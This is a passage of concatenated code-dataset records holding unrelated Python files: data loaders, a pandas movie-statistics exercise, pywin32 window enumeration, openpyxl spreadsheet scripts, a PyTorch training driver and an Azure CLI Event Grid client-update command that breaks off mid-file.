in files]\n\n            files = [firsts[params[\"pat\"]] + \"_concentration\"] + [pathlib.Path(x).stem for x in files]\n\n        self.time_filename_mapping = {}\n\n        for _, f in enumerate(files[1:]):\n\n            dt = get_delta_t(files[0], f)\n\n            if dt > Tmax:\n                print(\"Omit image\", f)\n                continue\n            \n            key = self.timeformat(dt)\n\n            self.time_filename_mapping[key] = f + \".mgz\"\n\n            if self.print_message:\n\n                print(\"Added \", key, \"=\", self.time_filename_mapping[key], \"to self.time_filename_mapping\")\n\n            # NOTE \"00.00\" is the IC, should not be included here\n            assert dt > 0\n\n        self.data_filter = data_filter\n\n        self.read_fun = read_image\n\n        self.measurements = {}\n\n\n    def timeformat(self, t):\n        return format(t, \".2f\")\n\n    def get_measurement(self, t):\n\n        try:\n            t = self.timeformat(t)\n            return self.measurements[t]\n\n        except KeyError:\n            \n            if isinstance(t, float):\n                t = self.timeformat(t)\n\n            assert t in self.time_filename_mapping.keys()\n            \n            filename = self.params[\"path_to_data\"] + self.time_filename_mapping[t]\n\n            self.measurements[t] = self.read_fun(filename, space=self.function_space, data_filter=self.data_filter)\n            \n            return self.measurements[t]\n    \n    def measurement_points(self):\n        \n        return sorted(list(map(lambda x: float(x), list(self.time_filename_mapping.keys()))))\n\n","repo_name":"bzapf/braintransport","sub_path":"diffusion_reaction_simulations/measurements.py","file_name":"measurements.py","file_ext":"py","file_size_in_byte":8919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"72229722073","text":"#!/usr/bin/env python3\n\n# Python 3.9.5\n\n# 18_non_persistant_temporary_file.py\n\n# Dependency\nfrom tempfile import TemporaryFile\n\nwith TemporaryFile('w+t', encoding='utf-8', errors='ignore') as tempfile:\n    \n    tempfile.write('Hello World!\\n')\n    tempfile.seek(0)\n    content = tempfile.read()\n    \n    print(content)\n\n# The non-persistent temporary file is now 
deleted.\n","repo_name":"fenceMeshwire/python_os_filesystem","sub_path":"18_non_persistant_temporary_file.py","file_name":"18_non_persistant_temporary_file.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29474912251","text":"import csv\nimport os\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\nengine = create_engine(os.getenv(\"DATABASE_URL\"))\ndb=scoped_session(sessionmaker(bind=engine))\n\ndef main():\n bookdata=open(\"books.csv\")\n reader = csv.reader(bookdata)\n for isbn, title, author, pubyear in reader:\n db.execute(\"INSERT INTO books (isbn, title, author, pubyear) VALUES (:isbn, :title, :author, :pubyear)\", {\"isbn\": isbn, \"title\": title, \"author\": author, \"pubyear\": pubyear})\n print(f\"Added {title} by {author}\")\n db.commit()\n\nif __name__==\"__main__\":\n main()\n","repo_name":"7GAcc/ENGO551_lab1","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24435562997","text":"#from flask_jwt_extended import get_jwt_identity, get_jwt_claims, jwt_required, verify_jwt_in_request\nfrom functools import wraps\nfrom app import JSONAPIResponseFactory\nfrom flask import request\n\nfrom app.api.route_registrar import json_loads\n\n\nerror_401 = JSONAPIResponseFactory.make_errors_response(\n {\n \"status\": 401,\n \"title\": \"Unauthorized\"\n },\n status=401\n)\n\n\ndef error_400(s):\n return JSONAPIResponseFactory.make_errors_response(\n {\n \"status\": 400,\n \"title\": \"Bad request\",\n \"detail\": s\n },\n status=400\n )\n\n\ndef error_403(s):\n return JSONAPIResponseFactory.make_errors_response(\n {\n \"status\": 403,\n \"title\": \"Forbidden\",\n \"detail\": s\n },\n status=403\n )\n\n\ndef export_to(export_funcs):\n def wrap(view_function):\n @wraps(view_function)\n def wrapped_f(*args, **kwargs):\n response = view_function(*args, **kwargs)\n if \"export\" in request.args:\n asked_format = request.args[\"export\"]\n if asked_format not in export_funcs:\n return error_400('Export format unknown or unavailable. 
Available values are : ' + ', '.join(['linkedplaces', 'inline-linkedplaces']))\n                func = export_funcs[asked_format]\n                try:\n                    data = json_loads(response.data)\n                    output_data, status, headers, content_type = func(request, data)\n                    response = JSONAPIResponseFactory.make_response(\n                        resource=output_data,\n                        status=status,\n                        headers=headers,\n                        content_type=content_type\n                    )\n                except Exception as e:\n                    return error_403(str(e))\n            return response\n\n        return wrapped_f\n\n    return wrap\n\n\n\n\n","repo_name":"chartes/dico-topo-app","sub_path":"app/api/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"11224480824","text":"import pandas as pd \nimport numpy as np\n\n#Don't forget to change the directory before importing the file\nmovies_dataset=pd.read_excel(\"movie_metadata.xlsx\")\n\n#Question 1\n#Using the shape attribute, how many rows and columns are in the data?\nprint(movies_dataset.shape)\n\n#Question 2\n\n#Yes, each row for one movie\n\n#Question 3\n#What is the longest movie duration in the data?\nmax_value=max(movies_dataset.duration)\nprint(max_value)\n\n\n#Question 4\n#What is the title of the shortest movie in the data?\n#result_movie_titles=movies_dataset[\"movie_title\"] \nmin_duration=min(movies_dataset.duration)\nprint(min_duration)#this prints the minimum duration as a number\n\n#looping through specific DataFrames rows \nfor row_label,row in movies_dataset.iterrows():\n    if row[\"duration\"]==min_duration: \n        print(row[\"movie_title\"])\n\n\n#Question 5\n#The following code adds a new column to the data named \n# \"duration_in_minutes\"\n#containing each movie's duration in hours\n\nduration_in_minutes=movies_dataset[\"duration\"]/60\nmovies_dataset[\"duration_in_minutes\"]=duration_in_minutes\n\n#Yes\n\n#How many movies were directed by the director\n#James Cameron\n\n#Question 6\nx=movies_dataset['director_name']==\"James Cameron\"\ndf1=movies_dataset[x]\nresult=df1[\"director_name\"].count()\nprint(result)\n\n#What is the mean of the movie durations in the data\n#Question 7\nprint(np.mean(movies_dataset[\"duration\"]))\n\n\n#What is the median of the movie durations in the data\n#Question 8\nprint(np.median(movies_dataset[\"duration\"]))\n\n\n#How many movies have\n#\"Danish\" or \"Dutch\" as their language \n#Question 9\ny=np.logical_or(movies_dataset['language']==\"Danish\",\n                movies_dataset['language']==\"Dutch\")\n\ndf2=movies_dataset[y]\nresult2=df2[\"language\"].count()\nprint(result2)\n\n#How many movies were produced in \"USA\"\n#Question 10\nz=movies_dataset['country']==\"USA\"\ndf3=movies_dataset[z]\nresult3=df3[\"country\"].count()\nprint(result3)\n\n#Create a report showing the number of color movies and the number of black-and-white movies produced in \"USA\"\n#Based on this report, how many color movies and how many black-and-white movies are there?\n#Question 11\n\nmovies_report_1=pd.pivot_table(df3,index=['is_colored']\n                              ,values=['country']\n                              ,aggfunc=\"count\")\n\nprint(movies_report_1)\n# =============================================================================\n\n#Question 12\n\nmovies_report_2=pd.pivot_table(df3,index=['main_genre']\n                              ,values=[\"country\",\n                                       \"imdb_score\"]\n                              ,aggfunc={\"country\":\"count\",\n                                        \"imdb_score\":np.mean,\n                                        })\n\n\nprint(movies_report_2.sort_values(\"imdb_score\"))\n\n\n\n#Question 13\n#Create a report showing the number of movies and the average movie ratings by \"main genre\" \n#for movies produced in \"USA\"\n#Based on this report\n#what are the top three genres by average 
التقييمات؟\n\nmovies_report_3=pd.pivot_table(df3,index=['main_genre']\n ,values=[\"imdb_score\",\n \"budget\"]\n ,aggfunc={\"imdb_score\":np.mean,\n \"budget\":np.mean,\n })\n\n\nprint(movies_report_3.sort_values(\"budget\"))\n\n#Question 14\n#قم بانشاء تقرير يظهر متوسط تقييمات الأفلام ومتوسط تكلفة الأفلام حسب ال \"main genre\" \n#التي تم انتاجها في \"USA\"\n#بالاعتماد على هذا التقرير ما هي أعلى ثلاثة genres حسب متوسط تكلفة الفيلم؟\nmovies_report_3=pd.pivot_table(df3,index=['main_genre']\n ,values=\"gross\"\n \n ,aggfunc={\"gross\":np.mean })\n\n\nprint(movies_report_3.sort_values(\"gross\"))\n\n\n\n","repo_name":"shadenalmangour/Paython_Practise","sub_path":"Week4/final_project_template.py","file_name":"final_project_template.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"ar","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"30112331871","text":"# -*- coding = uft-8 -*-\n# @File : G04b_pywin32.py\n# @Time : 2022/12/10 13:31 \n# @Author : Samuel HONG\n# @Description : How to acquire hwnd using python\n# @Version :\n\nimport sys\nimport win32gui\nimport win32con\n\n\n# get hwnd of all the windows.\ndef get_all_windows():\n hWnd_list = []\n win32gui.EnumWindows(lambda hWnd, param: param.append(hWnd), hWnd_list)\n print(hWnd_list)\n return hWnd_list\n\n\n# get hwnd of a sub window.\ndef get_son_windows(parent):\n hWnd_child_list = []\n win32gui.EnumChildWindows(parent, lambda hWnd, param: param.append(hWnd), hWnd_child_list)\n print(hWnd_child_list)\n return hWnd_child_list\n\n\n# get hwnd title.\ndef get_title(hwnd):\n title = win32gui.GetWindowText(hwnd)\n print('窗口标题:%s' % (title))\n return title\n\n\n# get hwnd classname.\ndef get_classname(hwnd):\n classname = win32gui.GetClassName(hwnd)\n print('窗口类名:%s' % (classname))\n return classname\n\n\nif __name__ == '__main__':\n hwnd_li = get_all_windows()\n for i in hwnd_li:\n print(i)\n get_title(i)\n print('\\r')\n\n hwnd = 197524\n title = win32gui.GetWindowText(hwnd)\n print(title)\n","repo_name":"IzumiOdotto/LabFile203","sub_path":"sampling_design/GUI/G04b_pywin32.py","file_name":"G04b_pywin32.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24778796235","text":"from random import *\n# import openpyxl\nimport openpyxl\nfrom openpyxl import Workbook\n\n# создадим рандомные данные в exel файл\n\n\nworkbook = Workbook()\nworksheet = workbook.active\n\nworksheet.cell(row=1, column=1).value = \"Имя\"\nworksheet.cell(row=1, column=2).value = \"Фамилия\"\nworksheet.cell(row=1, column=3).value = \"Должность\"\n\nlist_first_name = [\"Александр\", \"Михаил\", \"Максим\", \"Даниил\", \"Лев\", \"Артем\", \"Марк\", \"Иван\", \"Дмитрий\", \"Матвей\",\n \"Андрей\", \"Никита\", \"Егор\", \"Алексей\", \"Арсений\", \"Константин\", \"Давид\", \"Сергей\"]\nlist_second_name = [\"Смирнов\", \"Иванов\", \"Кузнецов\", \"Соколов\", \"Попов\", \"Лебедев\", \"Козлов\", \"Новиков\", \"Морозов\",\n \"Петров\", \"Волков\", \"Соловьёв\"]\nlist_work = [\"junior\", \"middle\", \"senior\"]\n\nfor row in range(1, 100):\n worksheet.cell(row=row, column=1).value = choice(list_first_name)\n worksheet.cell(row=row, column=2).value = choice(list_second_name)\n worksheet.cell(row=row, column=3).value = choice(list_work)\n\nworkbook.save(\"first_doc.xlsx\")\n\n# создадим рандомные данные в exel файл\n\n\n# переносим данные\n\nname_file = \"first_doc.xlsx\"\nworkbook = openpyxl.load_workbook(name_file)\nworksheet = 
workbook.active\n\n\nclass Main:\n def __init__(self):\n self.global_list = []\n row = 1\n col = 1\n while True:\n local_list = []\n while True:\n value = worksheet.cell(row=row, column=col).value\n if value is None:\n break\n local_list.append(value)\n col += 1\n self.global_list.append(local_list)\n row += 1\n col = 1\n value = worksheet.cell(row=row, column=col).value\n if value is None:\n break\n\n\nresults = Main()\nresults = results.global_list\n\nworkbook2 = Workbook()\nworksheet2 = workbook2.active\n\nindex = 0\n\n\nclass Create:\n def __init__(self, index):\n for row in results:\n print(row)\n for col in row:\n print(col)\n index_col = row.index(col)\n # index_row = results.index(row)\n worksheet2.cell(row=index + 1, column=index_col + 1).value = str(col)\n index += 1\n\n\ngo = Create(index)\n\nworkbook2.save(\"result.xlsx\")\n\n# переносим данные\n","repo_name":"SoloLeveling2005/python1","sub_path":"HW/14_06_2022/TASK_3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"30955073988","text":"import time, os\nimport torch\nimport numpy as np\nimport pandas as pd\nimport random\nfrom datetime import datetime\n\nfrom options import get_args\nfrom data import build_dataset\nfrom model import build_model\n\n\nif __name__=='__main__':\n\n tic = time.time()\n opt, message = get_args()\n print(message)\n if not opt.isTest: \n #random.seed(opt.seed)\n #np.random.seed(opt.seed)\n #torch.manual_seed(opt.seed)\n #torch.cuda.manual_seed_all(opt.seed)\n #torch.backends.cudnn.benchmark = True\n \n # build the dataset according to the options\n tr_loader, val_loader = build_dataset(opt)\n model = build_model(opt)\n model.setup()\n\n metric = []\n best_val_loss = 1000.0\n for epoch in range(opt.start_epoch, opt.epochs+opt.epochs_decay+opt.start_epoch):\n epoch_start_time = time.time()\n iter_data_time = time.time()\n\n old_lr, lr = model.update_learning_rate()\n\n tr_loss, tr_time, tr_data_time = model.train_one_epoch(tr_loader)\n val_loss, val_time, val_data_time = model.test_one_epoch(val_loader)\n\n if val_loss < best_val_loss:\n best_val_loss = val_loss\n model.save_networks('best')\n\n if (epoch > opt.save_start_epoch) and (epoch % opt.save_freq == 0):\n model.save_networks(epoch)\n\n print(f\"[{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}]\",\n f'Epoch [{epoch}/{opt.epochs+opt.epochs_decay}]',\n f'Time [epoch {time.time() - epoch_start_time:.6f}, data-tr {tr_data_time:.6f}, data-val {val_data_time:.6f}, train {tr_time:.6f}, val {val_time:.6f}]',\n f'Loss [train {tr_loss:.6f}, val {val_loss:.6f}]',\n f'lr [{old_lr:.6f} -> {lr:.6f}]')\n metric.append([epoch, tr_loss, val_loss, lr])\n columns = ['epoch', 'tr_loss', 'val_loss', 'lr']\n pd.DataFrame(data=metric, columns=columns).to_csv(\n os.path.join(model.save_dir, 'training.csv'), index=False) \n else:\n tr_loader, val_loader, te_loader = build_dataset(opt)\n model = build_model(opt)\n model.setup()\n tr_loss, tr_time, tr_data_time = model.test_one_epoch(tr_loader, savename='train')\n val_loss, val_time, val_data_time = model.test_one_epoch(\n val_loader, savename='val')\n te_loss, te_time, te_data_time = model.test_one_epoch(\n te_loader, savename='test')\n print(f\"[{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}]\",\n f\"Time {te_time+val_time+te_time}\",\n f\"loss [train: {tr_loss:.6f}, val: {val_loss:6f}, test: {te_loss:.6f}]\")\n print(f'Time consuming for all epochs: {(time.time() - tic)/60:.2f} 
minutes.')\n\n","repo_name":"cvvsu/RMEP","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"40108624818","text":"from azure.cli.core.aaz import *\n\n\n@register_command(\n \"eventgrid namespace client update\",\n is_preview=True,\n)\nclass Update(AAZCommand):\n \"\"\"Update a client.\n\n :example: Update client\n az eventgrid namespace client update -g rg --namespace-name name -n client-name --description test\n \"\"\"\n\n _aaz_info = {\n \"version\": \"2023-06-01-preview\",\n \"resources\": [\n [\"mgmt-plane\", \"/subscriptions/{}/resourcegroups/{}/providers/microsoft.eventgrid/namespaces/{}/clients/{}\", \"2023-06-01-preview\"],\n ]\n }\n\n AZ_SUPPORT_NO_WAIT = True\n\n AZ_SUPPORT_GENERIC_UPDATE = True\n\n def _handler(self, command_args):\n super()._handler(command_args)\n return self.build_lro_poller(self._execute_operations, self._output)\n\n _args_schema = None\n\n @classmethod\n def _build_arguments_schema(cls, *args, **kwargs):\n if cls._args_schema is not None:\n return cls._args_schema\n cls._args_schema = super()._build_arguments_schema(*args, **kwargs)\n\n # define Arg Group \"\"\n\n _args_schema = cls._args_schema\n _args_schema.client_name = AAZStrArg(\n options=[\"-n\", \"--name\", \"--client-name\"],\n help=\"Name of the client.\",\n required=True,\n id_part=\"child_name_1\",\n fmt=AAZStrArgFormat(\n pattern=\"^[-a-zA-Z0-9:\\._]*$\",\n max_length=128,\n min_length=1,\n ),\n )\n _args_schema.namespace_name = AAZStrArg(\n options=[\"--namespace-name\"],\n help=\"Name of the namespace.\",\n required=True,\n id_part=\"name\",\n fmt=AAZStrArgFormat(\n pattern=\"^[a-zA-Z0-9-]*$\",\n max_length=50,\n min_length=3,\n ),\n )\n _args_schema.resource_group = AAZResourceGroupNameArg(\n required=True,\n )\n\n # define Arg Group \"Properties\"\n\n _args_schema = cls._args_schema\n _args_schema.attributes = AAZFreeFormDictArg(\n options=[\"--attributes\"],\n arg_group=\"Properties\",\n help=\"Attributes for the client.\",\n nullable=True,\n )\n _args_schema.authentication = AAZObjectArg(\n options=[\"--authentication\"],\n arg_group=\"Properties\",\n help=\"Authentication information for the client.\",\n nullable=True,\n )\n _args_schema.client_certificate_authentication = AAZObjectArg(\n options=[\"--client-certificate-authentication\"],\n arg_group=\"Properties\",\n help=\"The client certificate authentication information.\",\n nullable=True,\n )\n _args_schema.description = AAZStrArg(\n options=[\"--description\"],\n arg_group=\"Properties\",\n help=\"Description for the Client resource.\",\n nullable=True,\n )\n _args_schema.state = AAZStrArg(\n options=[\"--state\"],\n arg_group=\"Properties\",\n help=\"Indicates if the client is enabled or not. 
Default value is Enabled.\",\n nullable=True,\n enum={\"Disabled\": \"Disabled\", \"Enabled\": \"Enabled\"},\n )\n\n authentication = cls._args_schema.authentication\n authentication.certificate_subject = AAZObjectArg(\n options=[\"certificate-subject\"],\n help=\"The CA certificate subject name used for authentication.\",\n nullable=True,\n )\n authentication.certificate_thumbprint = AAZObjectArg(\n options=[\"certificate-thumbprint\"],\n help=\"The self signed certificate's thumbprints data used for authentication.\",\n nullable=True,\n )\n\n certificate_subject = cls._args_schema.authentication.certificate_subject\n certificate_subject.common_name = AAZStrArg(\n options=[\"common-name\"],\n help=\"The common name field in the subject name. The allowed limit is 64 characters and it should be specified.\",\n nullable=True,\n fmt=AAZStrArgFormat(\n max_length=64,\n min_length=0,\n ),\n )\n certificate_subject.country_code = AAZStrArg(\n options=[\"country-code\"],\n help=\"The country code field in the subject name. If present, the country code should be represented by two-letter code defined in ISO 2166-1 (alpha-2). For example: 'US'.\",\n nullable=True,\n fmt=AAZStrArgFormat(\n max_length=2,\n min_length=2,\n ),\n )\n certificate_subject.organization = AAZStrArg(\n options=[\"organization\"],\n help=\"The organization field in the subject name. If present, the allowed limit is 64 characters.\",\n nullable=True,\n fmt=AAZStrArgFormat(\n max_length=64,\n min_length=0,\n ),\n )\n certificate_subject.organization_unit = AAZStrArg(\n options=[\"organization-unit\"],\n help=\"The organization unit field in the subject name. If present, the allowed limit is 32 characters.\",\n nullable=True,\n fmt=AAZStrArgFormat(\n max_length=32,\n min_length=0,\n ),\n )\n\n certificate_thumbprint = cls._args_schema.authentication.certificate_thumbprint\n certificate_thumbprint.primary = AAZStrArg(\n options=[\"primary\"],\n help=\"The primary thumbprint used for validation.\",\n nullable=True,\n )\n certificate_thumbprint.secondary = AAZStrArg(\n options=[\"secondary\"],\n help=\"The secondary thumbprint used for validation.\",\n nullable=True,\n )\n\n client_certificate_authentication = cls._args_schema.client_certificate_authentication\n client_certificate_authentication.allowed_thumbprints = AAZListArg(\n options=[\"allowed-thumbprints\"],\n help=\"The list of thumbprints that are allowed during client authentication. This property is required only if the validationScheme is 'ThumbprintMatch'.\",\n nullable=True,\n )\n client_certificate_authentication.validation_scheme = AAZStrArg(\n options=[\"validation-scheme\"],\n help=\"The validation scheme used to authenticate the client. 
Default value is SubjectMatchesAuthenticationName.\",\n nullable=True,\n enum={\"DnsMatchesAuthenticationName\": \"DnsMatchesAuthenticationName\", \"EmailMatchesAuthenticationName\": \"EmailMatchesAuthenticationName\", \"IpMatchesAuthenticationName\": \"IpMatchesAuthenticationName\", \"SubjectMatchesAuthenticationName\": \"SubjectMatchesAuthenticationName\", \"ThumbprintMatch\": \"ThumbprintMatch\", \"UriMatchesAuthenticationName\": \"UriMatchesAuthenticationName\"},\n )\n\n allowed_thumbprints = cls._args_schema.client_certificate_authentication.allowed_thumbprints\n allowed_thumbprints.Element = AAZStrArg(\n nullable=True,\n )\n return cls._args_schema\n\n def _execute_operations(self):\n self.pre_operations()\n self.ClientsGet(ctx=self.ctx)()\n self.pre_instance_update(self.ctx.vars.instance)\n self.InstanceUpdateByJson(ctx=self.ctx)()\n self.InstanceUpdateByGeneric(ctx=self.ctx)()\n self.post_instance_update(self.ctx.vars.instance)\n yield self.ClientsCreateOrUpdate(ctx=self.ctx)()\n self.post_operations()\n\n @register_callback\n def pre_operations(self):\n pass\n\n @register_callback\n def post_operations(self):\n pass\n\n @register_callback\n def pre_instance_update(self, instance):\n pass\n\n @register_callback\n def post_instance_update(self, instance):\n pass\n\n def _output(self, *args, **kwargs):\n result = self.deserialize_output(self.ctx.vars.instance, client_flatten=True)\n return result\n\n class ClientsGet(AAZHttpOperation):\n CLIENT_TYPE = \"MgmtClient\"\n\n def __call__(self, *args, **kwargs):\n request = self.make_request()\n session = self.client.send_request(request=request, stream=False, **kwargs)\n if session.http_response.status_code in [200]:\n return self.on_200(session)\n\n return self.on_error(session.http_response)\n\n @property\n def url(self):\n return self.client.format_url(\n \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/namespaces/{namespaceName}/clients/{clientName}\",\n **self.url_parameters\n )\n\n @property\n def method(self):\n return \"GET\"\n\n @property\n def error_format(self):\n return \"MgmtErrorFormat\"\n\n @property\n def url_parameters(self):\n parameters = {\n **self.serialize_url_param(\n \"clientName\", self.ctx.args.client_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"namespaceName\", self.ctx.args.namespace_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"resourceGroupName\", self.ctx.args.resource_group,\n required=True,\n ),\n **self.serialize_url_param(\n \"subscriptionId\", self.ctx.subscription_id,\n required=True,\n ),\n }\n return parameters\n\n @property\n def query_parameters(self):\n parameters = {\n **self.serialize_query_param(\n \"api-version\", \"2023-06-01-preview\",\n required=True,\n ),\n }\n return parameters\n\n @property\n def header_parameters(self):\n parameters = {\n **self.serialize_header_param(\n \"Accept\", \"application/json\",\n ),\n }\n return parameters\n\n def on_200(self, session):\n data = self.deserialize_http_content(session)\n self.ctx.set_var(\n \"instance\",\n data,\n schema_builder=self._build_schema_on_200\n )\n\n _schema_on_200 = None\n\n @classmethod\n def _build_schema_on_200(cls):\n if cls._schema_on_200 is not None:\n return cls._schema_on_200\n\n cls._schema_on_200 = AAZObjectType()\n _UpdateHelper._build_schema_client_read(cls._schema_on_200)\n\n return cls._schema_on_200\n\n class ClientsCreateOrUpdate(AAZHttpOperation):\n CLIENT_TYPE = \"MgmtClient\"\n\n def __call__(self, *args, **kwargs):\n request = 
self.make_request()\n session = self.client.send_request(request=request, stream=False, **kwargs)\n if session.http_response.status_code in [202]:\n return self.client.build_lro_polling(\n self.ctx.args.no_wait,\n session,\n self.on_200_201,\n self.on_error,\n lro_options={\"final-state-via\": \"azure-async-operation\"},\n path_format_arguments=self.url_parameters,\n )\n if session.http_response.status_code in [200, 201]:\n return self.client.build_lro_polling(\n self.ctx.args.no_wait,\n session,\n self.on_200_201,\n self.on_error,\n lro_options={\"final-state-via\": \"azure-async-operation\"},\n path_format_arguments=self.url_parameters,\n )\n\n return self.on_error(session.http_response)\n\n @property\n def url(self):\n return self.client.format_url(\n \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/namespaces/{namespaceName}/clients/{clientName}\",\n **self.url_parameters\n )\n\n @property\n def method(self):\n return \"PUT\"\n\n @property\n def error_format(self):\n return \"MgmtErrorFormat\"\n\n @property\n def url_parameters(self):\n parameters = {\n **self.serialize_url_param(\n \"clientName\", self.ctx.args.client_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"namespaceName\", self.ctx.args.namespace_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"resourceGroupName\", self.ctx.args.resource_group,\n required=True,\n ),\n **self.serialize_url_param(\n \"subscriptionId\", self.ctx.subscription_id,\n required=True,\n ),\n }\n return parameters\n\n @property\n def query_parameters(self):\n parameters = {\n **self.serialize_query_param(\n \"api-version\", \"2023-06-01-preview\",\n required=True,\n ),\n }\n return parameters\n\n @property\n def header_parameters(self):\n parameters = {\n **self.serialize_header_param(\n \"Content-Type\", \"application/json\",\n ),\n **self.serialize_header_param(\n \"Accept\", \"application/json\",\n ),\n }\n return parameters\n\n @property\n def content(self):\n _content_value, _builder = self.new_content_builder(\n self.ctx.args,\n value=self.ctx.vars.instance,\n )\n\n return self.serialize_content(_content_value)\n\n def on_200_201(self, session):\n data = self.deserialize_http_content(session)\n self.ctx.set_var(\n \"instance\",\n data,\n schema_builder=self._build_schema_on_200_201\n )\n\n _schema_on_200_201 = None\n\n @classmethod\n def _build_schema_on_200_201(cls):\n if cls._schema_on_200_201 is not None:\n return cls._schema_on_200_201\n\n cls._schema_on_200_201 = AAZObjectType()\n _UpdateHelper._build_schema_client_read(cls._schema_on_200_201)\n\n return cls._schema_on_200_201\n\n class InstanceUpdateByJson(AAZJsonInstanceUpdateOperation):\n\n def __call__(self, *args, **kwargs):\n self._update_instance(self.ctx.vars.instance)\n\n def _update_instance(self, instance):\n _instance_value, _builder = self.new_content_builder(\n self.ctx.args,\n value=instance,\n typ=AAZObjectType\n )\n _builder.set_prop(\"properties\", AAZObjectType, typ_kwargs={\"flags\": {\"client_flatten\": True}})\n\n properties = _builder.get(\".properties\")\n if properties is not None:\n properties.set_prop(\"attributes\", AAZFreeFormDictType, \".attributes\")\n properties.set_prop(\"authentication\", AAZObjectType, \".authentication\")\n properties.set_prop(\"clientCertificateAuthentication\", AAZObjectType, \".client_certificate_authentication\")\n properties.set_prop(\"description\", AAZStrType, \".description\")\n properties.set_prop(\"state\", AAZStrType, \".state\")\n\n attributes = 
_builder.get(\".properties.attributes\")\n if attributes is not None:\n attributes.set_anytype_elements(\".\")\n\n authentication = _builder.get(\".properties.authentication\")\n if authentication is not None:\n authentication.set_prop(\"certificateSubject\", AAZObjectType, \".certificate_subject\")\n authentication.set_prop(\"certificateThumbprint\", AAZObjectType, \".certificate_thumbprint\")\n\n certificate_subject = _builder.get(\".properties.authentication.certificateSubject\")\n if certificate_subject is not None:\n certificate_subject.set_prop(\"commonName\", AAZStrType, \".common_name\")\n certificate_subject.set_prop(\"countryCode\", AAZStrType, \".country_code\")\n certificate_subject.set_prop(\"organization\", AAZStrType, \".organization\")\n certificate_subject.set_prop(\"organizationUnit\", AAZStrType, \".organization_unit\")\n\n certificate_thumbprint = _builder.get(\".properties.authentication.certificateThumbprint\")\n if certificate_thumbprint is not None:\n certificate_thumbprint.set_prop(\"primary\", AAZStrType, \".primary\")\n certificate_thumbprint.set_prop(\"secondary\", AAZStrType, \".secondary\")\n\n client_certificate_authentication = _builder.get(\".properties.clientCertificateAuthentication\")\n if client_certificate_authentication is not None:\n client_certificate_authentication.set_prop(\"allowedThumbprints\", AAZListType, \".allowed_thumbprints\")\n client_certificate_authentication.set_prop(\"validationScheme\", AAZStrType, \".validation_scheme\")\n\n allowed_thumbprints = _builder.get(\".properties.clientCertificateAuthentication.allowedThumbprints\")\n if allowed_thumbprints is not None:\n allowed_thumbprints.set_elements(AAZStrType, \".\")\n\n return _instance_value\n\n class InstanceUpdateByGeneric(AAZGenericInstanceUpdateOperation):\n\n def __call__(self, *args, **kwargs):\n self._update_instance_by_generic(\n self.ctx.vars.instance,\n self.ctx.generic_update_args\n )\n\n\nclass _UpdateHelper:\n \"\"\"Helper class for Update\"\"\"\n\n _schema_client_read = None\n\n @classmethod\n def _build_schema_client_read(cls, _schema):\n if cls._schema_client_read is not None:\n _schema.id = cls._schema_client_read.id\n _schema.name = cls._schema_client_read.name\n _schema.properties = cls._schema_client_read.properties\n _schema.system_data = cls._schema_client_read.system_data\n _schema.type = cls._schema_client_read.type\n return\n\n cls._schema_client_read = _schema_client_read = AAZObjectType()\n\n client_read = _schema_client_read\n client_read.id = AAZStrType(\n flags={\"read_only\": True},\n )\n client_read.name = AAZStrType(\n flags={\"read_only\": True},\n )\n client_read.properties = AAZObjectType(\n flags={\"client_flatten\": True},\n )\n client_read.system_data = AAZObjectType(\n serialized_name=\"systemData\",\n flags={\"read_only\": True},\n )\n client_read.type = AAZStrType(\n flags={\"read_only\": True},\n )\n\n properties = _schema_client_read.properties\n properties.attributes = AAZFreeFormDictType()\n properties.authentication = AAZObjectType()\n properties.authentication_name = AAZStrType(\n serialized_name=\"authenticationName\",\n )\n properties.client_certificate_authentication = AAZObjectType(\n serialized_name=\"clientCertificateAuthentication\",\n )\n properties.description = AAZStrType()\n properties.provisioning_state = AAZStrType(\n serialized_name=\"provisioningState\",\n flags={\"read_only\": True},\n )\n properties.state = AAZStrType()\n\n authentication = _schema_client_read.properties.authentication\n 
authentication.certificate_subject = AAZObjectType(\n serialized_name=\"certificateSubject\",\n )\n authentication.certificate_thumbprint = AAZObjectType(\n serialized_name=\"certificateThumbprint\",\n )\n\n certificate_subject = _schema_client_read.properties.authentication.certificate_subject\n certificate_subject.common_name = AAZStrType(\n serialized_name=\"commonName\",\n )\n certificate_subject.country_code = AAZStrType(\n serialized_name=\"countryCode\",\n )\n certificate_subject.organization = AAZStrType()\n certificate_subject.organization_unit = AAZStrType(\n serialized_name=\"organizationUnit\",\n )\n\n certificate_thumbprint = _schema_client_read.properties.authentication.certificate_thumbprint\n certificate_thumbprint.primary = AAZStrType()\n certificate_thumbprint.secondary = AAZStrType()\n\n client_certificate_authentication = _schema_client_read.properties.client_certificate_authentication\n client_certificate_authentication.allowed_thumbprints = AAZListType(\n serialized_name=\"allowedThumbprints\",\n )\n client_certificate_authentication.validation_scheme = AAZStrType(\n 